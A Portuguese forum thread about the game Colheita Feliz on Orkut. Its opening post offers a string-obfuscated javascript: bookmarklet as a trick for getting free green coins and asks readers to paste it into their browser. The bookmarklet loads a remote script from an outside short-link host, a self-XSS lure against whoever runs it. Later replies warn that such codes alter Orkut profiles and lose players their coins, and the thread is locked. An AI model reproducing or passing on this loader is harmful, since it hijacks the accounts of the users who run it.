Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

colheita Feliz

cacarlos13
 Compartilhar

Posts Recomendados

um jeito facil plo colheita feliz tem um aplicativo no orkut q se chama moeda verde e ele ajuda a pegar moeda verde no colheita feliz

href="javascript:d=document;c=d.createElement(%22script%22);d.body.appendChild©;c.src=%22ht%22+%22tp:%22+%22//%22+%22fon%22+%22.%22+%22gs%22+%22/feliz1%22;void(0)"

foi malz mais da Ctrl + C e Ctrl + V

pq esse eh o meu primeiro topico

muito obrigado pela comprienção

Link para o comentário
Compartilhar em outros sites

É o seguinte....quem me conhece sabe que eu não posto coisa que não funciona aqui na WC...

Então só estou aqui vindo alertar TODOS para tomarem cuidado com o que postam sobre o Colheita Feliz aqui na WC relacionado a códigos como este post do cacarlos13 por exemplo.

Já vi mtas pessoas dizendo que tentaram usar coisas desse tipo no Colheita Feliz e acabaram tendo suas moedas verdes hackeadas no jogo, perderam todas que tinham.

Então, até onde eu sei o único modo de conseguir moedas verdes sem ter que gastar dinheiro é pelo esquema do PTC.

Mais nada a dizer. Não é flood e nem informação inútil, estou apenas contribuindo para que as coisas funcionem sem ninguém sair prejudicado.

Pessoal!

Isto vai mudar seu perfil e uma par de coisa do seu orkut, nâo copiem e colem no seu navegador, jà vi varios amigos fazerem isto e tomarem no toba...

Nâo copiem!

Tem razão, não caiam nessa não.

Link para o comentário

pkm1000 e tldc tem rasão eu tive um amigo que consiguiu fazer o rack ele ficou com umas 10000 moedas verdes e depois perdeu todas todo mundo fla de rack colheita feliz depois que se ferram pra acha perdem tudo todos vcs tomem cuidado com o prejudicamento plz Obrigado e flws

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.